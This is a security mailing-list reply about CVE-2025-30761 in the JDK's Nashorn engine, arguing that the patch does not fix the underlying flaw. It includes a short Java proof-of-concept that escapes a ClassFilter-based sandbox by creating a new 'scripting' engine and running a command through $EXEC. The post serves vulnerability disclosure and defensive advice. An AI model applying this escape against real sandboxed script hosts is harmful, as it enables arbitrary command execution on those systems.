oss-sec mailing list archives
Re: CVE-2025-30761:A vulnerability in JDK's Nashorn Allows for Arbitrary Code Execution
From: Moritz Bechler <mbechler () eenterphace org>
Date: Sun, 20 Jul 2025 18:26:27 +0200
Hi,interesting that they "fixed" this issue now. Way back (<https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/>) reporting something similar, I was told that Nashorn "sandboxing" was not supposed to be secure unless you also configure a SecurityManager (which implicitly suppresses the "engine" property). Restrictions purely based on a ClassFilter have been broken ever since then.
And the patch really does not address the fundamental issue, which is that you are able to get and configure a new engine. While the change may stop you from suppressing the inherited no-java flag, why not get direct command execution using another option instead:
System.setProperty("nashorn.args", "--no-java");
ScriptEngine e = new ScriptEngineManager().getEngineByName("nashorn");
String cmd =
"this.engine.factory.getScriptEngine(\"scripting\").eval('$EXEC(\"calc.exe\")')";
e.eval(cmd);
So, imho, the proper advice still should be not to use Nashorn for
running untrusted code.
best regards Moritz
Current thread:
- CVE-2025-30761:A vulnerability in JDK's Nashorn Allows for Arbitrary Code Execution liyajie (Jul 16)
- Re: CVE-2025-30761:A vulnerability in JDK's Nashorn Allows for Arbitrary Code Execution Moritz Bechler (Jul 21)